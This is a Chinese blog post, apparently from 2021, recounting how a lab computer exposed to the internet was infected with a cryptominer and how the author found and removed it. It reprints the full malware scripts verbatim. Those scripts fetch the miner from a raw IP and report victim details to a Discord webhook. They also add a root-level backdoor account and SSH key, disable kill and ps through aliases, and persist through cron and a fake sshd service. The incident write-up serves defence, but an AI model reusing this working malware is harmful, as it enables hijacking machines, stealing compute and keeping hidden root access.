记一次 挖矿程序入侵和处理

为了方便远程使用,师弟把实验室的电脑映射的公网上,结果被植入了挖矿程序

 

 挖矿软件是这个,因为已经被清理掉了,所以看不到运行了,不然的话,使用 nvidia-smi 命令可以看到这个挖矿程序在工作。

 

 然后进入到这个进程中, cd /proc/$PID , 查看它的信息

首先查看所有文件,可以看到挖矿程序被放到这个位置

 

 通过  cat status  可以查看进程信息

 

 其中PPID标识了进程的父类信息,这里我是在复现,所以父进程是4168,原本父进程是 2

然后把父进程杀死,把挖矿进程杀死,杀死挖矿程序。结果过一会挖矿程序又出现了,推测有定时执行任务,并且重启也不行。

首先查看开机自启脚本是否正常

vim /etc/rc.local

 

 这个文件是正常的,说明不是放到这的。

然后检查root账户的  .bashrc 文件

vim ~/.bashrc

 

 里面只有这么几行,这个明显是屏蔽掉了删除命令。切换到root账户,发现很多命令都被屏蔽掉了,那么肯定是出问题,但是这个文件又没有

运行挖矿程序。考虑定时任务,查看是否设置了crontab

ps -aux | grep crontab

发现果然存在定时任务,然后查看一下定时任务

crontab -e

 

可以看到这几个奇怪的任务,这里我给注释掉了

然后到 /var/tmp/.tmp/下看这几个文件

#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd /var/tmp/.tmp/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1
.b4nd1d0
#!/bin/bash
###Date###
user="sclipicibosu"
pass="saieilamuie"
gilimea='"'
ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
rm -rf *timeout
sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
nenea=`whoami`
uptime=$(</proc/uptime)
uptime=${uptime%%.*}
zile=$(( uptime/60/60/24 ))
secunde=$(( uptime%60 ))
minute=$(( uptime/60%60 ))
ore=$(( uptime/60/60%24 ))
sended=$(date +'%m/%d/%Y')
url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
##########
getingmineru(){
locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
if [ -f $locatie/PhoenixMiner ]; then
    :
    else
    curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
    tar xvf PhoenixMiner.tar
    chmod 777 PhoenixMiner/*
fi
}
###
locationperfection(){
tinlex=$(pwd)
    mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
    echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
    if [ $(id -u) = 0 ]; then
        if [ -f "/usr/bin/.locationesclipiciu" ]; then
            :
        else
            echo $tinlex > "/usr/bin/.locationesclipiciu"
        fi
    fi
}
###
showproof(){
echo '
{
  "content": null,
  "embeds": [
    {
      "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ",
      "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**",
      "color": 16711680
    }
  ]
}' > /tmp/.send.json
/usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
}
###
sshkiller(){
if [ $(id -u) = 0 ]; then
mkdir /usr/.SQL-Unix
mkdir /usr/.SQL-Unix/.SQL
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
                                                                                                                                                                       source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
' > ~/.bashrc
" > /usr/.SQL-Unix/.SQL/.db
echo "# .bashrc
                                                                                                                                                                       source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi

" > ~/.bash_profile
chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
echo $sshkey > "/root/.ssh/authorized_keys"
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
else
mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
                                                                                                                                                                       source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
' > ~/.bashrc
" > /var/tmp/.SQL-Unix/.SQL/.db
echo "# .bashrc
                                                                                                                                                                       source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
                                                                                                                                                                       echo Uname: $(uname -a)
" > ~/.bashrc
echo "
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi

" > ~/.bash_profile
fi
}
###
facuser(){
if [ $(id -u) = 0 ]; then
   if ! cat /etc/passwd | grep -q "${user}"; then
   /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
   yes "$pass" | passwd $user
   else
        :
   fi
fi
}
###
minerinio(){
locatie="$(pwd)"
if [ -f $locatie/.b4nd1d0 ]
then
locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd '$locatie'/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
    chmod 777 $locatie/.b4nd1d0
    $locatie/./.b4nd1d0
    else
    locatie="$(pwd)"
echo '#!/bin/bash
m1lbe1()
{
if ! pgrep -x PhoenixMiner >/dev/null
then
        cd '$locatie'/PhoenixMiner
        ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
        exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
chmod 777 $locatie/.b4nd1d0
$locatie/./.b4nd1d0
fi
}
###
crontablegend() {  
locatie="$(pwd)"
if ! crontab -l | grep -q '.placi'; then
   rm -rf $locatie/.5p4rk3l5
   echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
   sleep 1
   echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   echo "@monthly "$locatie"/./.placi  > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
   sleep 1
   crontab $locatie/.5p4rk3l5
   sleep 1
   source ~/.bashrc
   rm -rf $locatie/.5p4rk3l5
fi
}
###
locationperfection
sleep 0.5
echo "Locatie ON"
wait
getingmineru
sleep 0.5
echo "Minerul Luat"
wait
facuser
sleep 0.5
echo "User Facut"
wait
sshkiller
sleep 0.5
echo "SSH Mort"
wait
showproof
sleep 0.5
echo "Info Trimis"
wait
crontablegend
sleep 0.5
echo "Crontab Done"
wait
minerinio
sleep 0.5
echo "Minerul Pornit"
wait
###
checkingpid(){
    if [ -f /usr/bin/.pidsclip ]; then
        if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
            echo "Already running..."
        else 
            /usr/bin/sshd > /dev/null 2>&1 & disown
            echo $! > /usr/bin/.pidsclip
            chmod 777 /usr/bin/.pidsclip
            echo "Done"
        fi
    else
        /usr/bin/sshd > /dev/null 2>&1 & disown
        echo $! > /usr/bin/.pidsclip
        chmod 777 /usr/bin/.pidsclip
        echo "Done"
        fi
}
###
killingstrangers(){
echo '
#!/bin/bash
locatieasdf=$(cat /usr/bin/.locationesclipiciu)
if [ ! -d '$locatieasdf' ]; then
    mkdir '$locatieasdf'
    rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
    sleep 1
    '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
else
    if [ ! -f  '$locatieasdf'/PhoenixMiner ]; then
        rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
        sleep 1
        '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
fi' > /usr/bin/sshd
sleep 1
chmod 777 /usr/bin/sshd
}
###
pisamsystemu(){
echo '[Unit]
Description=Example systemd service.
[Service]
Type=simple
Restart=always
RestartSec=3600
ExecStart=/bin/bash /usr/bin/sshd
[Install]
WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
sleep 1
chmod 644 /lib/systemd/system/myservice.service
systemctl enable myservice
systemctl start myservice

if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    echo "Locatia este deja setata"
else
    if [ -f "/usr/bin/.locationesclipiciu" ]; then
        locationperfection
        echo "Am-rupt-locatiile-alea"
sleep 1
    fi
fi
if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    if [ -d "/var/tmp/.ladyg0g0" ]; then
        locationperfection
        locationperfection
        echo "Locatia a fost setata"
    else
        echo "Acum facem folderul"
        mkdir /var/tmp/.ladyg0g0/
        locationperfection
        locationperfection
        echo "Am setat locatia"
    fi
fi
if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
    if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
        echo "Already running..."
    else 
        $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
        echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
        echo "Done"
        fi
else
    $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
    echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    echo "Done"
fi
}
###
if [ $(id -u) = 0 ]; then
    if [ ! -d /usr/bin/.locationesclipiciu ]; then
    cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
    bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
        if [ ! -f /usr/bin/sshd ]; then
            killingstrangers
            pisamsystemu
            checkingpid
        fi
    fi
fi
###
.placi

可以看到这个人果然是在这里做了些操作,然后它把.bashrc文件重写,这也是我们之前查看没有直接发现问题的原因。其实如果它把.bashrc先备份一下,

然后执行完病毒再恢复,这样会更隐蔽。可能是个新手叭(虽然我找这个病毒也是找了好久。。)

至此,挖矿病毒就被清理掉了,吓的我也是赶紧把内网映射关掉了。果然有的人为了钱,啥事都能干。。

 

posted @ 2021-05-28 15:43  超级学渣渣  阅读(930)  评论(0编辑  收藏  举报